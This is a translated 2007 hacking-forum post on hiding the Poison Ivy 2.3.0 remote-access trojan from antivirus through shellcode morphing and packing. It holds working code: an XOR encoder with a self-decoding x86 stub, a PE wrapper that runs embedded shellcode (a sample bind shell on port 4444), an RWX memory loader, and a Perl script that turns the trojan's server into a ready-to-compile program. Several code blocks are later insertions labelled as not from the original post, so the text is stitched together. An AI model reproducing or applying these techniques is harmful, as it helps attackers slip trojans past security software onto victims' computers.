Some ideas on AV evasion (免杀) for Poison Ivy 2.3.0 - 漏洞预警 - 黑吧安全网 (myhack58)

2007-06-25T00:00:00
ID MYHACK58:62200715912
Type myhack58
Reporter 佚名 (anonymous)
Modified 2007-06-25T00:00:00

Description

I originally wanted to post this in the original-work section, but since it is being discussed in other places too, and there are certainly plenty of methods, I'll put it here; anyone with ideas, please comment.

Today on a foreign IRC channel I saw a few people discussing AV evasion for PI 2.3. Because the alignment PI 2.3 uses differs from earlier versions, a server that has been run through a packer no longer works, so evading AV with it has become a real concern. I downloaded the trial and tested it: after packing, the server did not run. However, PI 2.3 has a new feature that makes this much easier: it can emit the server as shellcode. I know shellcode, and I know morphing, so evasion should not be that hard. PI 2.3 can output the server as raw binary data, or as C, Delphi, Perl or Python format shellcode. Since I'm most familiar with the C format, I'll use that for the discussion.

Anyone who works with overflows knows that shellcode morphing is an important part of writing a trojan, and it applies to AV evasion as well: in theory you can get past both file scanning and memory scanning. A simple XOR transform only defeats the file scan, because the code is decoded again in memory; to confuse a memory scan you have to add junk code to the shellcode. There are many more morphing ideas than one post can cover. If you are interested, look at the better-known virus sites; I recommend http://vx.netlux.org, which has many ready-made morphing tools. In virus terms this kind of transform belongs to the polymorphic engines.

The general idea: if you use someone else's polymorphic engine to do the morphing, and it supports shellcode output in one of the formats mentioned above (C, Delphi and so on), then when generating the PI 2.3.0 server pick the binary output mode, and feed the resulting raw code to the polymorphic engine. tapion 1.0 c is one such tool; it can be found on the site above.

You can also morph by hand, though that is a lot of hassle; I mention it only as an idea. In short: first add junk instructions (花指令, the same concept as the padding instructions packers insert), then transform further, for example with XOR. The advantage is that once the result gets detected again it is easy to change; the obvious disadvantage is the amount of manual work, so I don't recommend it.

Then there is segmented morphing: split the shellcode into sections, morph each one, and reassemble the sections in a different order. The original execution order cannot change, so you have to add code that links the sections together. Each section then looks like: decryptor (decoding header) + the encrypted, modified code + the code that jumps to the next section. This is by far the most work, but it also gives by far the strongest morphing.

Reading this far, beginners like me are probably discouraged: who has the patience for all that? To be honest I haven't really done it that way myself; I just wanted to list what I could think of. Now for something simple, really simple: turn the generated shellcode into a PE file, and then process it with whatever packer you like.
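The single-byte XOR transform with a decoder in front of the code, which the post names as the simplest morphing step, worked through as an added example; it is not part of the original post and not Poison Ivy output. It takes any raw shellcode bytes, prepends a 23-byte 32-bit x86 decoder (the same bytes also decode correctly in 64-bit mode), patches the length and key into the stub, and XORs the payload. The stand-in payload and the key-selection rule are my own constructions, and the bad-byte filter is an optional extra for the case where the result is pasted into a C or Perl string. The C mirror of the decoder lets you verify the output on any machine without executing it.

```c
/* Added example: XOR-encode raw shellcode behind a self-decoding x86 stub.
 * Not from the original post; the payload below is a constructed stand-in. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define STUB_LEN 23
#define MAX_WRAP_LEN 0xFFFF   /* the stub loads the length into cx */

/* Constructed stand-in payload: mov eax, 42 ; ret (valid x86 and x86-64). */
const uint8_t demo_payload[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 };

/* Write decoder + (payload ^ key) into out. Returns the total length,
 * or 0 if the payload is empty, too long, or out is too small.
 * Decoder layout (offsets from the start of the blob):
 *   00 EB 10            jmp  short 0x12        ; to the call below
 *   02 5E               pop  esi               ; esi = payload address
 *   03 31 C9            xor  ecx, ecx
 *   05 66 B9 LL HH      mov  cx, len
 *   09 80 74 0E FF KK   xor  byte [esi+ecx-1], key
 *   0E E2 F9            loop 0x09
 *   10 EB 05            jmp  short 0x17        ; into the decoded payload
 *   12 E8 EB FF FF FF   call 0x02              ; pushes 0x17 (payload address)
 *   17 payload ^ key
 * Note the stub itself still contains 0x00 and 0xFF bytes. */
size_t xor_wrap(const uint8_t *payload, size_t len, uint8_t key,
                uint8_t *out, size_t out_cap)
{
    static const uint8_t stub[STUB_LEN] = {
        0xEB, 0x10,
        0x5E,
        0x31, 0xC9,
        0x66, 0xB9, 0x00, 0x00,          /* length patched below */
        0x80, 0x74, 0x0E, 0xFF, 0x00,    /* key patched below */
        0xE2, 0xF9,
        0xEB, 0x05,
        0xE8, 0xEB, 0xFF, 0xFF, 0xFF
    };
    if (len == 0 || len > MAX_WRAP_LEN || out_cap < STUB_LEN + len)
        return 0;
    memcpy(out, stub, STUB_LEN);
    out[7]  = (uint8_t)(len & 0xFF);
    out[8]  = (uint8_t)(len >> 8);
    out[13] = key;
    for (size_t i = 0; i < len; i++)
        out[STUB_LEN + i] = payload[i] ^ key;
    return STUB_LEN + len;
}

/* C mirror of what the stub does at run time: read length and key from
 * the stub, then XOR the encoded bytes from the end backwards. */
size_t xor_unwrap(const uint8_t *blob, size_t blob_len, uint8_t *out)
{
    if (blob_len < STUB_LEN) return 0;
    size_t len = blob[7] | ((size_t)blob[8] << 8);
    uint8_t key = blob[13];
    if (blob_len != STUB_LEN + len) return 0;
    for (size_t i = len; i > 0; i--)
        out[i - 1] = blob[STUB_LEN + i - 1] ^ key;
    return len;
}

/* Optional: first key (1..255) whose encoded payload contains none of the
 * `bad` bytes, e.g. 0x00 when the result is used as a C string. -1 if none. */
int pick_key(const uint8_t *payload, size_t len, const uint8_t *bad, size_t nbad)
{
    for (int k = 1; k < 256; k++) {
        int clean = 1;
        for (size_t i = 0; i < len && clean; i++)
            for (size_t b = 0; b < nbad; b++)
                if ((uint8_t)(payload[i] ^ k) == bad[b]) { clean = 0; break; }
        if (clean) return k;
    }
    return -1;
}

/* Wrap the stand-in with `key`, check the stub fields, and unwrap again. */
int round_trip_ok(uint8_t key)
{
    uint8_t blob[STUB_LEN + sizeof demo_payload], back[sizeof demo_payload];
    size_t n = xor_wrap(demo_payload, sizeof demo_payload, key, blob, sizeof blob);
    if (n != sizeof blob || blob[13] != key || blob[STUB_LEN] != (demo_payload[0] ^ key))
        return 0;
    return xor_unwrap(blob, n, back) == sizeof demo_payload &&
           memcmp(back, demo_payload, sizeof demo_payload) == 0;
}

int main(void)
{
    uint8_t blob[STUB_LEN + sizeof demo_payload];
    const uint8_t bad[] = { 0x00 };
    int key = pick_key(demo_payload, sizeof demo_payload, bad, sizeof bad);
    size_t n = xor_wrap(demo_payload, sizeof demo_payload, (uint8_t)key, blob, sizeof blob);
    printf("key=0x%02x, %zu bytes, round trip %s\n", key, n,
           round_trip_ok((uint8_t)key) ? "ok" : "FAILED");
    for (size_t i = 0; i < n; i++) printf("\\x%02x", blob[i]);
    putchar('\n');
    return 0;
}
```

The output of xor_wrap can be pasted straight into the PE wrapper in place of the PI shellcode: the stub does its own GetPC via call/pop, so it works wherever the array ends up. Because the decoder writes to the bytes that follow it, the blob must sit in memory that is writable as well as executable, which is exactly what the /SECTION:.text,EWR flag in the wrapper provides.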

For example, if you generate C-format shellcode, the following code turns it into a PE file. The linker pragmas do the real work: merging .rdata and .data into .text and marking .text EWR (executable, writable, readable) puts the shellcode array into an executable section, so calling into it does not trip DEP, and /ENTRY:MyEntry skips the C runtime startup to keep the binary small. The __asm block is MSVC inline assembly, which only exists in the 32-bit compiler, so build this as an x86 executable:

Code Language : C

#include <windows.h>

#pragma comment(linker, "/MERGE:.rdata=.text /MERGE:.data=.text /SECTION:.text,EWR")
#pragma comment(linker, "/subsystem:windows /ENTRY:MyEntry")
#pragma comment(linker, "/INCREMENTAL:NO")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow);

/* C-format shellcode; this sample binds to local port 4444. Replace it with the PI output. */
unsigned char PIshellcode[] = "\xD9\xE1\xD9\x34\x24\x58\x58\x58"
"\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"
"\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"
"\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"
"\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"
"\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"
"\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"
"\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"
"\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"
"\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"
"\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"
"\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"
"\xA3\x6D\xC5\xC5\xFA\x90\x92\x83\xCE\x1B\x74\xF8\x82\xC4\xC1\x6D"
"\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"
"\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"
"\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"
"\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"
"\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"
"\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"
"\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"
"\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"
"\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"
"\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"
"\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"
"\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)
{
    /* The array lives in .text (merged above) and the section is EWR, so it can be called directly. */
    __asm {
        lea eax, PIshellcode
        call eax
    }
    return 1;
}

/* Custom entry point: no CRT startup, just call WinMain and exit with its result. */
void MyEntry(void)
{
    ExitProcess(WinMain(GetModuleHandle(NULL), NULL, GetCommandLine(), SW_HIDE));
}

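The linker pragmas in the wrapper above are one way to get the array into executable memory. The other common way, shown here as an added example that is not from the original post, is to ask the operating system for writable and executable memory at run time and copy the shellcode into it. This compiles on Windows (VirtualAlloc with PAGE_EXECUTE_READWRITE) and on POSIX (mmap with PROT_EXEC), needs no inline assembly so it also builds as 64-bit, and works for self-decoding blobs because the memory is writable as well. The 6-byte payload is a constructed stand-in (mov eax, 42 ; ret), not Poison Ivy output, and it only runs on x86 hosts; elsewhere the loader refuses and returns -1.

```c
/* Added example: run a raw shellcode blob from explicitly allocated RWX memory.
 * Not from the original post; the payload is a constructed stand-in. */
#ifndef _WIN32
#define _DEFAULT_SOURCE          /* MAP_ANONYMOUS on glibc */
#include <sys/mman.h>
#else
#include <windows.h>
#endif
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

typedef int (*entry_fn)(void);

/* Constructed stand-in payload: mov eax, 42 ; ret (valid x86 and x86-64). */
const uint8_t demo_payload[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 };

/* 1 if this build can execute the x86 stand-in, else 0. */
int host_is_x86(void)
{
#if defined(__x86_64__) || defined(__i386__) || defined(_M_X64) || defined(_M_IX86)
    return 1;
#else
    return 0;
#endif
}

/* Get fresh read/write/execute memory and copy the code into it.
 * Returns NULL on failure (including len == 0). */
void *alloc_exec(const uint8_t *code, size_t len)
{
    if (len == 0) return NULL;
#ifdef _WIN32
    void *p = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (p == NULL) return NULL;
#else
    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) return NULL;
#endif
    memcpy(p, code, len);
    return p;
}

void free_exec(void *p, size_t len)
{
#ifdef _WIN32
    (void)len;
    VirtualFree(p, 0, MEM_RELEASE);
#else
    munmap(p, len);
#endif
}

/* Load `code` and call it as a function returning int.
 * Returns the payload's eax, or -1 if it could not be run. */
int run_payload(const uint8_t *code, size_t len)
{
    if (!host_is_x86()) return -1;
    void *mem = alloc_exec(code, len);
    if (mem == NULL) return -1;
    entry_fn fn;
    memcpy(&fn, &mem, sizeof fn);   /* object pointer -> function pointer without a cast */
    int result = fn();
    free_exec(mem, len);
    return result;
}

int main(void)
{
    printf("payload returned %d\n", run_payload(demo_payload, sizeof demo_payload));
    return 0;
}
```

This is also what most packer stubs do internally once they have unpacked the original code, so from the defender's side the pattern to look for is the same in both cases: an RWX allocation (or a section with write and execute flags, as in the pragma version) followed by a call into it.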

The shellcode in that listing binds to local port 4444; replace it with the PI shellcode you generate. Once the program compiles, you can process it with a packer or any other evasion method you can think of. I kept size in mind, so the wrapper is as small as I could make it, though it could no doubt be trimmed further. The morphing discussed earlier ends up going through the same program to produce a PE, just without the packer step afterwards. To make it easy to turn the binary-format file into text-format shellcode and build the C code above, I wrote a Perl script that generates both Perl- and C-format shellcode:

Code Language : Perl

#!/usr/bin/perl
# written by mika[EST]
# bin2shellcode.pl: turn a raw .bin file into Perl- and C-format shellcode
use strict;

my $BinName = shift || die "Usage: $0 <bin name> (no .bin suffix)\n";
my $bindata;

open(BF, "<$BinName.bin") || die "cannot open $BinName.bin: $!\n";
binmode(BF);                        # raw bytes, no CRLF translation on Windows
$bindata = join('', <BF>);
close(BF);

print "+ Length: " . length($bindata) . " bytes\n";

print "+ Generating Perl shellcode file " . $BinName . ".pl ...";
my $buffer = BufferPerl($bindata);
open(PF, ">$BinName.pl") || die "cannot write $BinName.pl: $!\n";
print PF "my \$PlShellcode=" . $buffer;
close(PF);
print "Done\n";

print "+ Generating C shellcode file " . $BinName . ".cpp ...";
$buffer = BufferC($bindata);
my $C_shellcode;
while (<DATA>) { $C_shellcode .= $_; }
$C_shellcode =~ s/::SHELLCODE::/$buffer/g;
open(CF, ">$BinName.cpp") || die "cannot write $BinName.cpp: $!\n";
print CF $C_shellcode;
close(CF);
print "Done\n";

# Emit the bytes as "\xNN" string chunks of $width bytes, joined with Perl's "." operator
sub BufferPerl
{
    my ($data, $width) = @_;
    my ($res, $count);

    if (!defined $data || !length $data) { return }
    if (!$width) { $width = 16 }

    $res = '"';
    $count = 0;
    foreach my $char (split(//, $data))
    {
        if ($count == $width)
        {
            $res .= '".' . "\n" . '"';
            $count = 0;
        }
        $res .= sprintf("\\x%.2x", ord($char));
        $count++;
    }
    if ($count) { $res .= '";' . "\n"; }
    return $res;
}

# Same chunks for C: adjacent string literals concatenate, so drop the "." operators
sub BufferC
{
    my ($data, $width) = @_;
    my $res = BufferPerl($data, $width);
    if (!$res) { return }
    $res =~ s/\.//g;
    return $res;
}

__DATA__
#include <windows.h>

#pragma comment(linker, "/MERGE:.rdata=.text /MERGE:.data=.text /SECTION:.text,EWR")
#pragma comment(linker, "/subsystem:windows /ENTRY:MyEntry")
#pragma comment(linker, "/INCREMENTAL:NO")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow);

char PIshellcode[] =
::SHELLCODE::

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)
{
    __asm {
        lea eax, PIshellcode
        call eax
    }
    return 1;
}

void MyEntry(void)
{
    ExitProcess(WinMain(GetModuleHandle(NULL), NULL, GetCommandLine(), SW_HIDE));
}


Using it is simple. When generating the PI 2.3.0 server, choose the binary output format and save it as, say, test.bin. Copy test.bin into the same directory as the script and run from cmd: perl bin2shellcode.pl test (without the .bin suffix). The script then writes two files into that directory: test.pl, the shellcode in Perl format, and test.cpp, which is not just the shellcode but a complete C++ program with the shellcode already embedded, ready to compile under VC. Note the tail of the generated listing below: the server configuration (here the strings test, temp, 127.0.0.1 and admin) is stored in plain text at the end of the shellcode, so it is visible in the file and, once any XOR layer has decoded itself, in memory. The generated cpp file looks like this:

Code Language : C

#include <windows.h>

#pragma comment(linker, "/MERGE:.rdata=.text /MERGE:.data=.text /SECTION:.text,EWR")
#pragma comment(linker, "/subsystem:windows /ENTRY:MyEntry")
#pragma comment(linker, "/INCREMENTAL:NO")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow);

char PIshellcode[] =
"\x55\x8b\xec\x81\xc4\x3c\xf2\xff\xff\x60\x33\xc0\x8d\xbd\x90\xf2"
"\xff\xff\xb9\x5b\x0d\x00\x00\xf3\xaa\x33\xc0\x8d\xbd\x4c\xf2\xff"
"\xff\xb9\x44\x00\x00\x00\xf3\xaa\xc7\x85\xb9\xf3\xff\xff\xe6\x00"
// ... remaining shellcode omitted ...
"\x04\x00\x74\x65\x73\x74\xf9\x0b\x04\x00\x74\x65\x6d\x70\x90\x01"
"\x0d\x00\x09\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x00\x84\x0d\x8c"
"\x01\x04\x00\x00\x00\x00\x00\xc1\x02\x04\x00\xff\xff\xff\xff\x45"
"\x01\x05\x00\x61\x64\x6d\x69\x6e\xfb\x03\x09\x00\x29\x21\x56\x6f"
"\x71\x41\x2e\x49\x34\x00\x00\x00\x00";

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)
{
    __asm {
        lea eax, PIshellcode
        call eax
    }
    return 1;
}

void MyEntry(void)
{
    ExitProcess(WinMain(GetModuleHandle(NULL), NULL, GetCommandLine(), SW_HIDE));
}


Simple, right? That is as far as my idea goes; let's discuss it here on the forum!

PS: I fell today and split my knee open badly; it took several stitches and really hurts!